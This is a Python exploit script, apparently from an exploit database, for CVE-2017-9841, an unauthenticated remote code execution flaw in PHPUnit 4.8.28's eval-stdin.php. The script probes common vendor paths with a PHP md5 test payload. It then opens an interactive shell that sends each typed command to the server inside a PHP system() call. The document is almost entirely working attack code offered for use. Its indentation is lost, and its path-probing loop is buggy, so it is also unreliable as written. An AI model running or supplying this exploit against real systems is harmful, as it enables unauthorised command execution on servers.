# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2022/01/30
# Exploit Author: souzo
# Vendor Homepage: phpunit.de
# Version: 4.8.28
# Tested on: Unit
# CVE : CVE-2017-9841
import requests
from sys import argv
phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
def check_vuln(site):
vuln = False
try:
for i in phpfiles:
site = site+i
req = requests.get(site,headers= {
"Content-Type" : "text/html",
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
},data="<?php echo md5(phpunit_rce); ?>")
if "6dd70f16549456495373a337e6708865" in req.text:
print(f"Vulnerable: {site}")
return site
except:
return vuln
def help():
exit(f"{argv[0]} <site>")
def main():
if len(argv) < 2:
help()
if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
help()
site = argv[1]
if site.endswith("/"):
site = list(site)
site[len(site) -1 ] = ''
site = ''.join(site)
pathvuln = check_vuln(site)
if pathvuln == False:
exit("Not vuln")
try:
while True:
cmd = input("> ")
req = requests.get(str(pathvuln),headers={
"User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
"Content-Type" : "text/html"
},data=f'<?php system(\'{cmd}\') ?>')
print(req.text)
except Exception as ex:
exit("Error: " + str(ex))
main()